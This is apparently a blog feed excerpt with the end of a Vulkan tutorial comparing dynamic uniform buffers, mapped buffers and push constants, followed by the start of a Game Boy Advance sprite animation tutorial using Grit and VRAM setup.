<p>In the above code, I don’t need to call vkFlushMappedMemoryRanges or similar because the buffer memory was allocated with the VK_MEMORY_PROPERTY_HOST_COHERENT_BIT flag set. Without that, you’d have to manually tell Vulkan when you changed the data at that pointer. Host coherent memory is very likely slower than the alternative, but for buffers which are completely changed every frame, I’m not sure there’s much of a difference.</p>
<p>I haven’t tested out anything using non-host coherent memory though, so I reserve the right to be totally wrong about that.</p>
<h2 id="single-dynamic-uniform-buffer">Single Dynamic Uniform Buffer</h2>
<p>The second approach I tried was to allocate a single VkBuffer which was large enough to store the uniform data for every object inside it, treating the buffer’s contents as an array of uniform data. Since in my case, I was submitting an array of mesh ids alongside the uniform data, this meant that I didn’t need to store any extra info in the primitive instance struct. As long as both arrays were in the same order, the right mesh would get drawn with the right uniform data.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">PrimitiveInstance</span>
<span class="p">{</span>
<span class="n">vec3</span> <span class="n">pos</span><span class="p">;</span>
<span class="n">vec3</span> <span class="n">scale</span><span class="p">;</span>
<span class="n">vec4</span> <span class="n">col</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">meshID</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>One caveat to this approach is that each object’s data has to start at an offset inside the VkBuffer that is a multiple of your GPU’s minUniformBufferOffsetAlignment limit. In my case, I was already getting my VkPhysicalDeviceProperties when I initialized everything, so that value was easily accessible. With that alignment, you can then figure out how much space each object needs, and exactly how big your VkBuffer has to be:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">size_t</span> <span class="n">deviceAlignment</span> <span class="o">=</span> <span class="n">deviceProps</span><span class="p">.</span><span class="n">limits</span><span class="p">.</span><span class="n">minUniformBufferOffsetAlignment</span><span class="p">;</span>
<span class="kt">size_t</span> <span class="n">uniformBufferSize</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="p">);</span>
<span class="kt">size_t</span> <span class="n">dynamicAlignment</span> <span class="o">=</span> <span class="p">(</span><span class="n">uniformBufferSize</span> <span class="o">/</span> <span class="n">deviceAlignment</span><span class="p">)</span> <span class="o">*</span> <span class="n">deviceAlignment</span> <span class="o">+</span> <span class="p">((</span><span class="n">uniformBufferSize</span> <span class="o">%</span> <span class="n">deviceAlignment</span><span class="p">)</span> <span class="o">></span> <span class="mi">0</span> <span class="o">?</span> <span class="n">deviceAlignment</span> <span class="o">:</span> <span class="mi">0</span><span class="p">);</span>
<span class="kt">size_t</span> <span class="n">bufferSize</span> <span class="o">=</span> <span class="n">primitiveCount</span> <span class="o">*</span> <span class="n">dynamicAlignment</span><span class="p">;</span> <span class="c1">//one aligned slot per primitive</span></code></pre></figure>
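<p>If the rounding in that snippet is hard to read, here’s the same idea as a small sketch with some numbers plugged in. The function names are mine (they aren’t in the repo), and the 80 byte object size assumes a mat4 plus a vec4. The buffer then needs one aligned slot per object.</p>

```cpp
#include <cassert>
#include <cstddef>

// Round size up to the next multiple of alignment (same result as the
// divide/modulo expression above).
constexpr std::size_t alignUp(std::size_t size, std::size_t alignment)
{
    return ((size + alignment - 1) / alignment) * alignment;
}

// Bitmask version of the same thing. Only valid when alignment is a power
// of two, which the Vulkan spec requires of minUniformBufferOffsetAlignment.
constexpr std::size_t alignUpPow2(std::size_t size, std::size_t alignment)
{
    return (size + alignment - 1) & ~(alignment - 1);
}

// Total bytes for count objects, each in its own aligned slot.
constexpr std::size_t dynamicBufferSize(std::size_t objectSize, std::size_t alignment, std::size_t count)
{
    return alignUp(objectSize, alignment) * count;
}

static_assert(alignUp(80, 256) == 256, "80 bytes rounds up to one 256 byte slot");
static_assert(alignUp(80, 64) == 128, "80 bytes needs two 64 byte steps");
static_assert(alignUp(80, 16) == 80, "80 is already a multiple of 16");
static_assert(alignUpPow2(80, 64) == alignUp(80, 64), "both forms agree");
```

<p>With a 256 byte alignment and the 5000 blocks from the stress test, dynamicBufferSize(80, 256, 5000) works out to 1,280,000 bytes, so more than two thirds of the buffer is padding. That’s the price of a single dynamic buffer on hardware with a large alignment.</p>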
<p>Once you know the alignment you need, you can use MSVC’s _aligned_malloc function (its alignment argument has to be a power of two) to actually get an aligned block of memory, which you can then memcpy into the VkBuffer’s mapped pointer.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//_aligned_malloc needs a power of two alignment, which deviceAlignment always is</span>
<span class="n">uniformData</span> <span class="o">=</span> <span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="o">*</span><span class="p">)</span><span class="n">_aligned_malloc</span><span class="p">(</span><span class="n">bufferSize</span><span class="p">,</span> <span class="n">deviceAlignment</span><span class="p">);</span></code></pre></figure>
<p>Since the PrimitiveUniformObject struct itself has no notion of alignment, you have to space your writes into buffer memory accordingly:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//abbreviated code</span>
<span class="kt">int</span> <span class="n">idx</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">uniformChar</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">uniformData</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="k">const</span> <span class="k">auto</span><span class="o">&</span> <span class="n">prim</span> <span class="o">:</span> <span class="n">primitives</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">PrimitiveUniformObject</span> <span class="n">puo</span><span class="p">;</span>
<span class="n">puo</span><span class="p">.</span><span class="n">model</span> <span class="o">=</span> <span class="n">VIEW_PROJECTION</span> <span class="o">*</span> <span class="p">(</span><span class="n">glm</span><span class="o">::</span><span class="n">translate</span><span class="p">(</span><span class="n">prim</span><span class="p">.</span><span class="n">pos</span><span class="p">)</span> <span class="o">*</span> <span class="n">glm</span><span class="o">::</span><span class="n">scale</span><span class="p">(</span><span class="n">prim</span><span class="p">.</span><span class="n">scale</span><span class="p">));</span>
<span class="n">puo</span><span class="p">.</span><span class="n">color</span> <span class="o">=</span> <span class="n">prim</span><span class="p">.</span><span class="n">col</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">uniformChar</span><span class="p">[</span><span class="n">idx</span> <span class="o">*</span> <span class="n">dynamicAlignment</span><span class="p">],</span> <span class="o">&</span><span class="n">puo</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="p">));</span>
<span class="n">idx</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
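<p>Here’s a standalone sketch of that spacing that you can run without a Vulkan device. I’ve swapped _aligned_malloc for a std::vector to keep it portable (only the offsets inside the VkBuffer have to respect the device alignment, the CPU side copy doesn’t care), and Mat4, Vec4, packUniforms and readUniform are made up names for illustration.</p>

```cpp
#include <cassert>
#include <cstddef>
#include <cstring>
#include <vector>

// Stand-ins for glm::mat4 and glm::vec4 (assumption: tightly packed floats).
struct Mat4 { float m[16]; };
struct Vec4 { float v[4]; };
struct PrimitiveUniformObject { Mat4 model; Vec4 color; };

// Copy each object to the start of its own aligned slot. stride plays the
// role of dynamicAlignment and must be at least sizeof(PrimitiveUniformObject).
std::vector<char> packUniforms(const std::vector<PrimitiveUniformObject>& objects, std::size_t stride)
{
    assert(stride >= sizeof(PrimitiveUniformObject));
    std::vector<char> staging(objects.size() * stride, 0);
    for (std::size_t i = 0; i < objects.size(); ++i)
    {
        std::memcpy(staging.data() + i * stride, &objects[i], sizeof(PrimitiveUniformObject));
    }
    return staging;
}

// Read one object back out of its slot, which is handy for checking the layout.
PrimitiveUniformObject readUniform(const std::vector<char>& staging, std::size_t stride, std::size_t index)
{
    PrimitiveUniformObject out;
    std::memcpy(&out, staging.data() + index * stride, sizeof(out));
    return out;
}
```

<p>The bytes between the end of one object and the start of the next slot are just padding. The shader never sees them, because each draw only reads sizeof(PrimitiveUniformObject) bytes starting at its own offset.</p>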
<p>Likewise, when you allocate your VkBuffer, you’re going to want to request a buffer of size dynamicAlignment * number of primitives, and you’ll want to make sure the descriptor that points at it has the type VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER_DYNAMIC, both in your descriptor set layout binding and in the pool sizes of the descriptorPool you allocate the descriptor set from.</p>
<p>With all of that set up, you can then copy your frame data to the uniform buffer like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span><span class="o">*</span> <span class="n">udata</span> <span class="o">=</span> <span class="n">nullptr</span><span class="p">;</span>
<span class="n">vkMapMemory</span><span class="p">(</span><span class="n">device</span><span class="p">,</span> <span class="n">buffer</span><span class="p">.</span><span class="n">deviceMemory</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">dynamicAlignment</span> <span class="o">*</span> <span class="n">PRIM_COUNT</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="o">&</span><span class="n">udata</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">udata</span><span class="p">,</span> <span class="n">uniformData</span><span class="p">,</span> <span class="n">dynamicAlignment</span> <span class="o">*</span> <span class="n">PRIM_COUNT</span><span class="p">);</span>
<span class="n">vkUnmapMemory</span><span class="p">(</span><span class="n">device</span><span class="p">,</span> <span class="n">buffer</span><span class="p">.</span><span class="n">deviceMemory</span><span class="p">);</span></code></pre></figure>
<p>And finally, you need to pass an offset in your calls to vkCmdBindDescriptorSets. This offset tells Vulkan where in the single buffer’s data to grab each object’s individual uniform data. Since it’s a byte offset, you’ll need to have the dynamicAlignment value we calculated earlier handy:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">PRIM_COUNT</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">dynamicOffset</span> <span class="o">=</span> <span class="n">i</span> <span class="o">*</span> <span class="n">static_cast</span><span class="o"><</span><span class="kt">uint32_t</span><span class="o">></span><span class="p">(</span><span class="n">dynamicAlignment</span><span class="p">);</span>
<span class="n">vkCmdBindDescriptorSets</span><span class="p">(</span><span class="n">commandBuffer</span><span class="p">,</span>
<span class="n">VK_PIPELINE_BIND_POINT_GRAPHICS</span><span class="p">,</span>
<span class="n">pipelineLayout</span><span class="p">,</span>
<span class="mi">0</span><span class="p">,</span>
<span class="mi">1</span><span class="p">,</span>
<span class="o">&</span><span class="n">descriptorSet</span><span class="p">,</span>
<span class="mi">1</span><span class="p">,</span>
<span class="o">&</span><span class="n">dynamicOffset</span><span class="p">);</span>
<span class="c1">// rest of per object draw code goes here</span>
<span class="p">}</span></code></pre></figure>
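<p>One thing that loop glosses over is that dynamic offsets are 32 bit values, while dynamicAlignment is a size_t. For a Breakout clone that’s never going to matter, but here’s a small sketch that computes the offsets up front and checks they fit. dynamicOffsets is a hypothetical helper, not something from my repo.</p>

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <limits>
#include <vector>

// Byte offset of every object's slot, in the uint32_t form that
// vkCmdBindDescriptorSets takes for its dynamic offsets.
std::vector<std::uint32_t> dynamicOffsets(std::size_t primCount, std::size_t dynamicAlignment)
{
    std::vector<std::uint32_t> offsets;
    offsets.reserve(primCount);
    for (std::size_t i = 0; i < primCount; ++i)
    {
        const std::size_t offset = i * dynamicAlignment;
        // A big enough buffer would overflow a 32 bit offset, so check first.
        assert(offset <= std::numeric_limits<std::uint32_t>::max());
        offsets.push_back(static_cast<std::uint32_t>(offset));
    }
    return offsets;
}
```

<p>Each entry is a multiple of dynamicAlignment, so as long as dynamicAlignment was rounded up from minUniformBufferOffsetAlignment, every offset is automatically legal to pass to the bind call.</p>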
<p>That should be enough to get you going, but we can make this faster too.</p>
<h2 id="always-mapped-single-buffer">Always Mapped Single Buffer</h2>
<p>Just like the multi-buffer approach, we can speed up the single buffer solution by keeping that buffer always mapped. Since we only have one buffer, this is a trivial change to the code. If you wanted, you could even just do it inside your update function like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">static</span> <span class="kt">void</span><span class="o">*</span> <span class="n">udata</span> <span class="o">=</span> <span class="n">nullptr</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">udata</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vkMapMemory</span><span class="p">(</span><span class="n">device</span><span class="p">,</span> <span class="n">buffer</span><span class="p">.</span><span class="n">deviceMemory</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">dynamicAlignment</span> <span class="o">*</span> <span class="n">PRIM_COUNT</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="o">&</span><span class="n">udata</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">udata</span><span class="p">,</span> <span class="n">uniformData</span><span class="p">,</span> <span class="n">dynamicAlignment</span> <span class="o">*</span> <span class="n">PRIM_COUNT</span><span class="p">);</span></code></pre></figure>
<p>Of course, you probably shouldn’t do it like this, but there’s no performance reason not to, so I’m going to back away slowly from discussing code quality issues now.</p>
<h2 id="push-constants">Push Constants</h2>
<p>To finish things off, let’s take a look at our big winner from the performance tests. Push constants are great for data that updates this frequently because you don’t actually need to allocate any buffers for it. This also means that we need to do a few things differently from the previous 4 approaches we’ve looked at, like changing how we declare our uniform data struct in glsl:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">layout</span><span class="p">(</span><span class="n">push_constant</span><span class="p">)</span> <span class="n">uniform</span> <span class="n">PER_OBJECT</span>
<span class="p">{</span>
<span class="n">mat4</span> <span class="n">mvp</span><span class="p">;</span>
<span class="n">vec4</span> <span class="n">col</span><span class="p">;</span>
<span class="p">}</span> <span class="n">obj</span><span class="p">;</span></code></pre></figure>
<p>Next, instead of creating any VkBuffers, when we create our pipeline layout, we need to specify a push constant range:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">VkPushConstantRange</span> <span class="n">pushConstantRange</span> <span class="o">=</span> <span class="p">{};</span>
<span class="n">pushConstantRange</span><span class="p">.</span><span class="n">offset</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">pushConstantRange</span><span class="p">.</span><span class="n">size</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="p">);</span>
<span class="n">pushConstantRange</span><span class="p">.</span><span class="n">stageFlags</span> <span class="o">=</span> <span class="n">VK_SHADER_STAGE_VERTEX_BIT</span><span class="p">;</span>
<span class="n">VkPipelineLayoutCreateInfo</span> <span class="n">pipelineLayoutInfo</span> <span class="o">=</span> <span class="p">{};</span>
<span class="c1">//..other init code here</span>
<span class="n">pipelineLayoutInfo</span><span class="p">.</span><span class="n">pSetLayouts</span> <span class="o">=</span> <span class="o">&</span><span class="n">descriptorSetLayout</span><span class="p">;</span> <span class="c1">// still need this</span>
<span class="n">pipelineLayoutInfo</span><span class="p">.</span><span class="n">pushConstantRangeCount</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">pipelineLayoutInfo</span><span class="p">.</span><span class="n">pPushConstantRanges</span> <span class="o">=</span> <span class="o">&</span><span class="n">pushConstantRange</span><span class="p">;</span></code></pre></figure>
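<p>Like the comment above says, my pipeline layout still gets a descriptorSetLayout even when using push constants. As far as I can tell, that’s only strictly required if your shaders still read something through descriptor sets (setLayoutCount is allowed to be 0); the push constant data itself is described by the VkPushConstantRange and the push_constant block in the shader. Either way, you don’t need to make any descriptorSets to pass that data to the shader.</p>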
<p>Instead, where you might otherwise call vkCmdBindDescriptorSets, you do the following:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">PRIM_COUNT</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vkCmdPushConstants</span><span class="p">(</span>
<span class="n">commandBuffer</span><span class="p">,</span>
<span class="n">pipelineLayout</span><span class="p">,</span>
<span class="n">VK_SHADER_STAGE_VERTEX_BIT</span><span class="p">,</span>
<span class="mi">0</span><span class="p">,</span>
<span class="k">sizeof</span><span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="p">),</span>
<span class="o">&</span><span class="n">uniformData</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
<span class="c1">// rest of per object draw code goes here</span>
<span class="p">}</span></code></pre></figure>
<p>That should cover it (assuming I haven’t missed a step). Given the option, push constants feel a lot cleaner for passing small bits of data to shaders, which makes sense given that they’re tailor made for that purpose. It is nice to have the most performant option also be the easiest to work with.</p>
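<p>I mentioned at the top that push constants have a size limit, so here’s a quick sketch of checking a range against it. The Vulkan spec only guarantees 128 bytes of push constant space (the real number for your card is in VkPhysicalDeviceLimits::maxPushConstantsSize), and it wants the offset and size of a range to be multiples of 4. The helper name and the stand-in Mat4 and Vec4 types are mine.</p>

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Stand-ins for glm::mat4 and glm::vec4 (assumption: tightly packed floats).
struct Mat4 { float m[16]; };
struct Vec4 { float v[4]; };
struct PrimitiveUniformObject { Mat4 model; Vec4 color; };

// Minimum value of maxPushConstantsSize that every Vulkan device must support.
constexpr std::uint32_t kGuaranteedPushConstantBytes = 128;

// True if a push constant range is legal for a device with the given limit:
// non-empty, 4 byte aligned offset and size, and entirely inside the limit.
constexpr bool pushConstantRangeFits(std::uint32_t offset, std::uint32_t size, std::uint32_t maxPushConstantsSize)
{
    return size > 0 && offset % 4 == 0 && size % 4 == 0
        && offset < maxPushConstantsSize
        && size <= maxPushConstantsSize - offset;
}

static_assert(pushConstantRangeFits(0, static_cast<std::uint32_t>(sizeof(PrimitiveUniformObject)),
                                    kGuaranteedPushConstantBytes),
              "an 80 byte mat4 + vec4 fits in the guaranteed 128 bytes");
```

<p>So the 80 byte PrimitiveUniformObject fits everywhere, but adding a second mat4 would push it to 144 bytes, past what the spec guarantees. That’s the point where the buffer based approaches above start earning their keep.</p>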
<h2 id="conclusion">Conclusion</h2>
<p>That wraps up the implementation details for everything. To get a sense of when to use each approach, I recommend you check out NVidia’s <a href="https://developer.nvidia.com/vulkan-shader-resource-binding">Vulkan Shader Resource Binding</a> page.</p>
<p>I’m a complete beginner with Vulkan, so if you see anything weird or just plain wrong in this post, please send me a message <a href="https://twitter.com/khalladay">on Twitter</a>. I would love to hear from you! Likewise, if there’s a resource out there that’s helped you get a handle on Vulkan, please pass it along.</p>
<p>Until next time!
<br /><br /></p>
<font size="2"><div style="border-style:solid; background-color:#DDDDDD ">
<strong>Appendix: Testing Methodology</strong><br />
In case reviewing testing methods is your thing, here's how I got the numbers in all the graphs in this post:<br /><br />
<li>When testing, the time step of the game logic was set to 0 (rather than deltaTime), so that any variations in frame rate from things like removing bricks, or handling game restart logic were eliminated. Then, the game was run for 20k frames, reporting the average frametime after every 5k frames. This gave me 4 average frame time numbers. I discarded the highest and lowest of these numbers, and then averaged the two remaining values to produce an average frametime for the test.</li><br />
<li>I monitored my CPU and GPU temp with the <a href="https://camwebapp.com/">Cam Web App</a>, and let both of them return to their resting temp between tests (61 and 66 C respectively), and made sure that the same applications (and only those applications) were running alongside the breakout program.</li><br />
<li>I repeated this test 2 more times, at different times of the day (after using the laptop to do other tasks), which gave me 3 frametime averages (1 per run of the test). I chose the median of the three to present in the graph above.</li><br />
<li>Finally, all tests were done in Release builds, without a debugger attached or any validation layers turned on, and with the laptop plugged into a wall outlet so that battery throttling couldn't interfere with anything.</li><br />
<li>All the source for everything is <a href="https://github.com/khalladay/VkBreakout">on github</a>. I would love for someone to compile everything and run a similar test to see if the results for my GPU can be replicated on someone else's hardware.</li>
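<p>In case it helps anyone trying to replicate the numbers, the averaging described above boils down to something like the sketch below. The function names are made up for this post, and it isn't the code I actually used to crunch the results.</p>

```cpp
#include <algorithm>
#include <array>
#include <cassert>

// One test run: takes the four 5k-frame averages, drops the highest and the
// lowest, and returns the mean of the two that remain.
double runAverage(std::array<double, 4> windowAverages)
{
    std::sort(windowAverages.begin(), windowAverages.end());
    return (windowAverages[1] + windowAverages[2]) / 2.0;
}

// Final number for the graph: the median of the three runs.
double medianOfRuns(std::array<double, 3> runs)
{
    std::sort(runs.begin(), runs.end());
    return runs[1];
}
```

<p>Both steps are there to throw away outliers. One slow window or one bad run (a background task waking up, for example) shouldn't be able to drag the reported frametime around.</p>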
</div>
</font>
GBA By Example - Sprite Animation2017-06-02T00:00:00+00:00http://kylehalladay.com/blog/tutorial/gba/2017/06/02/GBA-By-Example-5<p>(Note: This is Part 5 of my GBA by Example series. A list of my other GBA tutorials can be found <a href="http://kylehalladay.com/gba.html">here</a>)</p>
<p>Whew, it’s been awhile! I know I said I’d put up another tutorial in 2 weeks…but that didn’t happen. Between shipping a game at work, and diving into Vulkan, my interest for GBA stuff definitely took a back seat. Lesson learned, don’t put a deadline on blog posts :)</p>
<p>So far, I’ve gotten by with doing the bare minimum for anything art related, but our end products have never been too exciting. So this article is going to fix that. First, we’re going to walk through the process of grabbing some (public domain) sprites off of <a href="https://opengameart.org/">OpenGameArt.org</a>, importing those into our game, and then using them to animate a character as we move them around the screen.</p>
<p>At the end of the article, we should have something that looks like this:</p>
<div align="center">
<img src="/images/post_images/2017-06-07/hero.gif" style="width:240px;height:160px" />
<br />
</div>
<p>Wooooo! Finally something that kinda looks like a game! Let’s get this train rolling.</p>
<h2 id="getting-our-assets">Getting Our Assets</h2>
<p>All the character sprites we’re working with today come from <a href="https://opengameart.org/content/classic-hero-and-baddies-pack">this asset</a> on OpenGameArt. I chose these sprites not only because they had a sane palette and sprite size (which is hard to find, since not a lot of people are making assets with the GBA’s limitations in mind), but also because they’re public domain, so I can use them in this article without the chance of getting sued. Woohoo!</p>
<p>It also means you can use these sprites in your own projects (even commercial projects), which is also pretty cool.</p>
<p>I took the liberty of extracting only the character sprites we’re going to use today into their own spritesheet, which you can grab below:</p>
<div align="center">
<img src="/images/post_images/2017-06-07/charsprites.bmp" />
<br />
</div>
<p>This should save us having to do any pixel editing for this blog post, but we will have to export these sprites into a useable format for our game. To do that, we’re going to use a nifty open source tool called <a href="http://www.coranac.com/projects/grit/">Grit</a>. I mentioned this tool in a previous post, but today I’m going to walk through using it as well. If you don’t have that downloaded already, grab it now and let’s get started.</p>
<h2 id="exporting-sprite-data">Exporting Sprite Data</h2>
<p>Grit is a tool for taking bitmap images, and exporting them into .h/.c files (among other potential types of files), for consumption by a GBA game. We need to export each of our character sprites using it, and then manually load that data in our program like we’ve been doing before.</p>
<p>I’m going to use the GUI version of grit, which you can find in the program folder, titled “wingrit.” There’s a command line app as well, but I haven’t needed to use it yet (and if I can avoid memorizing more command line args, I will). If you’re following along with me, open wingrit, and you should see the following:</p>
<div align="center">
<img src="/images/post_images/2017-06-07/wingrit.PNG" />
<br />
</div>
<p>Simply open our sprite sheet image (with File->Open), and you should see it in the GUI window. Once you see the image, we need to open the export window, so go to View->GBAExport, and you should see this rather intimidating window pop up:</p>
<div align="center">
<img src="/images/post_images/2017-06-07/exportwindow.PNG" />
<br />
</div>
<p>Like the window itself says, don’t panic :) There are only a few things we need to do. First, we need to make sure that we’ve set the export to 8 bits per pixel; you’ll find that option in the top right of the window. Next, tell it to export .h/.c files: in the “File” section, set the type to “C (*.c).” You’ll also want to set where the exported files should go in the larger text field above the type dropdown. After that, we need to set the size of our sprite, which, for all of our sprites here, means setting the “Meta/Obj” section to square, size 2, which corresponds to 16x16 pixel sprites.</p>
<p>Finally, I always export the data as 32 bit unsigned integers. Whenever I use a smaller data type I end up running into weirdness with memcpy at some point. Since we aren’t going to be modifying the raw data anyway, the fact that storing all the data as 32 bit integers makes it harder for humans to read is a non-issue. So set your export type to “u32.”</p>
<p>Once all that is set up, click ok, and you should see a success popup.</p>
<p>One of the coolest parts about grit is its ability to export multiple sprites from a sprite sheet. Since we told Grit that our sprites were 16x16 pixels in size, it was smart enough to be able to parse the sprite sheet correctly and give us .h/.c files with the data in a nicely useable format. So don’t worry about needing to run grit for each individual sprite, it’s already done all the work for us.</p>
<h2 id="importing-sprite-data">Importing Sprite Data</h2>
<p>Now that we have our sprite data exported, we need to get it into VRAM. This should look familiar if you’ve been following along with previous articles. All we need to do is a few memcpys and we’re good to go:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include "charsprites.h"
#include <string.h>
#include "gba.h"
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">charspritesTiles</span><span class="p">,</span> <span class="n">charspritesTilesLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_PALETTE</span><span class="p">,</span> <span class="n">charspritesPal</span><span class="p">,</span> <span class="n">charspritesPalLen</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>One thing that is different this week is that I’ve moved all the memory address defines and typedefs that we need into an include file called gba.h. This is mostly for my sanity, and to keep my code samples cleaner. You can grab this include file <a href="https://github.com/khalladay/GBA-By-Example/blob/master/4-SpriteAnimation/code/gba.h">here</a>. Everything that is in this include has been shown explicitly in a previous post I’ve made, so don’t worry about parsing through it, unless you see something in a code sample that you don’t remember.</p>
<p>Ok, now that we have our data in video memory, we also need to set up our application’s Display Control register so it knows how to interpret it:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_0</span> <span class="o">|</span> <span class="n">BACKGROUND_0</span> <span class="o">|</span> <span class="n">ENABLE_OBJECTS</span> <span class="o">|</span> <span class="n">MAPPINGMODE_1D</span><span class="p">;</span></code></pre></figure>
<p>This should look identical to the last time we used sprites, because it is ;) but as a refresher:</p>
<ul>
<li>VIDEOMODE_0 is a tiled video mode, meaning that our backgrounds are built out of tiles instead of being drawn directly to the screen buffer</li>
<li>BACKGROUND_0 enables the 0th background. I’m going to use this to colour the background of our game</li>
<li>ENABLE_OBJECTS is the flag that tells the hardware to draw sprites (which the GBA calls objects)</li>
<li>MAPPINGMODE_1D means that our sprites are stored in a 1 Dimensional array. Grit takes care of this for us.</li>
</ul>
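<p>If you’re curious what those flags boil down to, here is a rough sketch. The names match the ones used above, but the real definitions live in gba.h, so treat the values below as an assumption based on the standard bit layout of the GBA’s display control register. buildDisplayControl is a made-up helper that only exists for this example.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c">// Assumed values, following the usual display control bit layout.
// Check gba.h for the definitions this series actually uses.
#define VIDEOMODE_0     0x0000  // bits 0-2: video mode 0 (tiled)
#define MAPPINGMODE_1D  0x0040  // bit 6: sprite tiles stored as a 1D array
#define BACKGROUND_0    0x0100  // bit 8: enable background 0
#define ENABLE_OBJECTS  0x1000  // bit 12: enable sprite (object) rendering

// Hypothetical helper: the value we write into REG_DISPLAYCONTROL.
unsigned short buildDisplayControl(void)
{
    return VIDEOMODE_0 | BACKGROUND_0 | ENABLE_OBJECTS | MAPPINGMODE_1D;
}</code></pre></figure>
<p>Each flag occupies its own bits, which is why they can simply be OR’d together in any order.</p>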
<p>Wonderful! To finish off our setup, let’s add our game loop. Remember that returning from a GBA program’s main function is undefined, so our game loop needs to never terminate. For now, let’s also add a call to our hacky little vsync function in the main loop. This function is defined in gba.h, and it’s the same one I’ve used in every other post.</p>
<p>Put together, our starting point looks like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include "charsprites.h"
#include <string.h>
#include "gba.h"
</span><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">charspritesTiles</span><span class="p">,</span> <span class="n">charspritesTilesLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_PALETTE</span><span class="p">,</span> <span class="n">charspritesPal</span><span class="p">,</span> <span class="n">charspritesPalLen</span><span class="p">);</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_0</span> <span class="o">|</span> <span class="n">BACKGROUND_0</span> <span class="o">|</span> <span class="n">ENABLE_OBJECTS</span> <span class="o">|</span> <span class="n">MAPPINGMODE_1D</span><span class="p">;</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Perfect! Now we’re ready to get down to the fun stuff!</p>
<h2 id="getting-our-character-on-screen">Getting our Character On Screen</h2>
<p>I always like to work in small, easily verifiable steps when I’m learning something new. So before we dig really far into animating our character, let’s just get our hero on screen. We covered this <a href="http://localhost:4000/blog/tutorial/gba/2017/04/04/GBA-By-Example-2.html">in an earlier post</a>, but today I want to do things a bit differently. Since we’re animating our character today, we should probably talk about double buffering object memory.</p>
